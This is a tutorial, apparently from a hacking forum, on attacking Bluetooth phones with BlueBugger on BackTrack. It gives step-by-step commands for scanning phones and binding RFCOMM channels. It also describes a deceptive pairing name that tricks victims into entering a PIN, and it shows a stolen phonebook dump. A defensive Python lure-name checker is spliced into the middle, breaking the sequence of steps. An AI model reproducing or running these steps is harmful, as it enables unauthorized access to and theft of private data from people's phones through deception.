

BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain unauthorized access to the phonebook, call lists and other private information.
This tutorial will show you the usage of bluebugger, but I have noticed over time that there is a lack of information on the internet about Bluetooth hacking. I haven't managed to successfully exploit a phone without fooling the client into entering a set key.
How did I do this?
Exploiting clients using a key is hard, but it is effective if the client isn't sure what they are doing with their phone. For example, I can name the Bluetooth device that will be connecting to the client's phone "Facebook Friend Request Enter 1234 To Add Friend". I found it quite amusing that people would enter the key. Once they have entered the key we have a remote connection allowing the attacker to make phone calls, gather info about the phone, copy the phonebook, read their messages and more.
Enough talk, let's begin with the tutorial. The first stage is to bring up the Bluetooth device that is either connected to or built into your computer so it is ready for scanning. Here is how it can be done:

root@bt:~# hciconfig hci0 up
root@bt:~#
Now the device is up and running, the device's class needs to be changed so it shows as a cell/mobile phone. This is pretty simple; you will be using the same tool, hciconfig:
root@bt:~# hciconfig hci0 class 0x050204
root@bt:~#
Now the class is set. If you would like, you can check that the class is set by using the following command:

root@bt:~# hciconfig -a
hci0:   Type: USB
        BD Address: 00:15:83:C6:67:90 ACL MTU: 384:8 SCO MTU: 64:8
        UP RUNNING
        RX bytes:354 acl:0 sco:0 events:12 errors:0
        TX bytes:44 acl:0 sco:0 commands:12 errors:0
        Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
        Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
        Link policy:
        Link mode: SLAVE ACCEPT
        Name: 'BT2.0'
        Class: 0x050204
        Service Classes: Positioning, Rendering
        Device Class: Phone, Cellular
        HCI Ver: 2.0 (0x3) HCI Rev: 0x7a6 LMP Ver: 2.0 (0x3) LMP Subver: 0x7a6
        Manufacturer: Cambridge Silicon Radio (10)
root@bt:~#
Now the device is set up and ready for scanning and exploitation. You can scan for devices with:
root@bt:~# hcitool scan
Scanning ...
        20:D6:07:A9:B6:F9       Animals phone
        00:24:03:7E:CB:80       Nokia 6500c
        40:2B:A1:0A:6A:88       C903
root@bt:~#
As you can see from the scan, there are multiple phones in my household. Why is this information useful? All of these are phones: a Sony Ericsson C903, a Nokia 6500c and "Animals phone". The scan also gives each device's broadcast address, but we need a little more info than this, like channel numbers. You can find that info by using this command:
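The attack in this post relies on the victim accepting a pairing with a device whose name tells them which PIN to type. As an added example (not part of the original post), here is a small Python checker that parses hcitool scan output in the format shown above and flags device names that read like pairing-PIN lures; the sample scan, the 00:11:22:33:44:55 address and the lure patterns are constructed assumptions, not values from the tutorial.

```python
import re

# Constructed sample in the shape printed by `hcitool scan` on BlueZ 4.x:
# a "Scanning ..." header, then one "<BD address> <tab> <name>" line per device.
# The 00:11:22:33:44:55 entry is a made-up lure device for the demonstration.
SAMPLE_SCAN = """Scanning ...
\t20:D6:07:A9:B6:F9\tAnimals phone
\t00:24:03:7E:CB:80\tNokia 6500c
\t00:11:22:33:44:55\tFacebook Friend Request Enter 1234 To Add Friend
\t40:2B:A1:0A:6A:88\tC903
"""

# One discovered-device line: six hex octets separated by colons, then the name.
BDADDR_RE = re.compile(r"^\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(.*\S)\s*$")

# Heuristic patterns (assumptions) for names that try to talk a user into
# typing a pairing PIN: an instruction followed by "pin"/"key"/digits, or a
# 4-8 digit number combined with accept/add/friend/connect/pair wording.
LURE_PATTERNS = [
    re.compile(r"\b(enter|type|use|input)\s+(pin|key|code|\d{4,})", re.I),
    re.compile(r"\b\d{4,8}\b.*\b(accept|add|friend|connect|pair)", re.I),
    re.compile(r"\b(accept|add)\s+friend", re.I),
]


def parse_scan(text):
    """Return [(bdaddr, name), ...] parsed from hcitool scan output."""
    devices = []
    for line in text.splitlines():
        m = BDADDR_RE.match(line)
        if m:
            devices.append((m.group(1).upper(), m.group(2)))
    return devices


def is_lure_name(name):
    """True when a device name matches one of the PIN-lure heuristics."""
    return any(p.search(name) for p in LURE_PATTERNS)


def flag_lures(text):
    """Return the (bdaddr, name) entries whose name looks like a PIN lure."""
    return [(addr, name) for addr, name in parse_scan(text) if is_lure_name(name)]


if __name__ == "__main__":
    for addr, name in flag_lures(SAMPLE_SCAN):
        print(f"suspicious device name: {addr}  {name!r}")
```

Note that "Nokia 6500c" is not flagged: the digits are glued to the trailing "c", so the standalone-number pattern does not match, which is the kind of false positive a model-number-heavy scan would otherwise produce.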
root@bt:~# sdptool browse 40:2B:A1:0A:6A:88   <----- broadcast addresses will differ
Browsing 40:2B:A1:0A:6A:88 ...
Service Description: Sony Ericsson C903
Service RecHandle: 0x10000
Service Class ID List:
  "PnP Information" (0x1200)

Service Name: OBEX SyncML Client
Service RecHandle: 0x2008002
Service Class ID List:
  UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10
  "OBEX" (0x0008)

Service Name: Serial Port 1
Service RecHandle: 0x2008003
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2

Service Name: Dial-up Networking
Service RecHandle: 0x2008004
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0101
[SNIP]
So now there is enough information gathered. All that is left to do is bind to the remote device. This can be done using rfcomm; here is the command for doing so:
root@bt:~# rfcomm bind rfcomm0 40:2B:A1:0A:6A:88
Usage of rfcomm:
root@bt:~# rfcomm -h
RFCOMM configuration utility ver 4.12
Usage:
        rfcomm [options] <command> <dev>

Options:
        -i [hciX|bdaddr]      Local HCI device or BD Address
        -h, --help            Display help
        -r, --raw             Switch TTY into raw mode
        -A, --auth            Enable authentication
        -E, --encrypt         Enable encryption
        -S, --secure          Secure connection
        -M, --master          Become the master of a piconet
        -f, --config [file]   Specify alternate config file
        -a                    Show all devices (default)

Commands:
        bind     <dev> <bdaddr> [channel]   Bind device
        release  <dev>                      Release device
        show     <dev>                      Show device
        connect  <dev> <bdaddr> [channel]   Connect device
        listen   <dev> [channel [cmd]]      Listen
        watch    <dev> [channel [cmd]]      Watch
root@bt:~#
Now it is time to launch an attack on the client with bluebugger. But like I was saying at the beginning of the guide, there are problems with the key. The only way I have solved this so far is to fool the client into entering a key. In BackTrack 4 there is no way of setting a default key, so I did a bit of googling and came up with using a tool called simple-agent that comes with the BlueZ tool set. You can download it here.
I have placed this file in:
directory, then I launch simple-agent:
root@bt:~# /etc/init.d/bluetooth start
Starting bluetooth: bluetoothd.
root@bt:~# /etc/bluetooth/simple-agent
Agent registered
simple-agent is now listening for the Bluetooth device to ask for the PIN for pairing the devices.
Then I can launch bluebugger with the following:
root@bt:~# bluebugger -m "Facebook Friend Request Enter 1234 To Accept" -c 2 -a 40:2B:A1:0A:6A:88  phonebook
-m  Name to send to the client
-c  Channel to connect to on the client's phone
-a  Broadcast address
phonebook  Read the client's phonebook
root@bt:~# /etc/bluetooth/simple-agent
Agent registered
RequestPinCode (/org/bluez/hci0/dev_40_2B_A1_0A_6A_88)
Enter PIN Code: 1234
My bluebugger output:
Name:   Chipmunk/M","2010/12/15,13:19
Number: 07XXXXX8559
Name:   Martyn/M","2010/12/09,14:01
Number: 07XXXXX4856
Name:   ","2010/11/17,09:22
Number: 07XXXXX5057
Name:   Leana/M","2010/09/30,22:58
Number: 07XXXXX4943
[SNIP]
As you can see, by fooling the client into entering the pass key you can gain access to the phone.

For personal tutorials, follow me and ask your questions.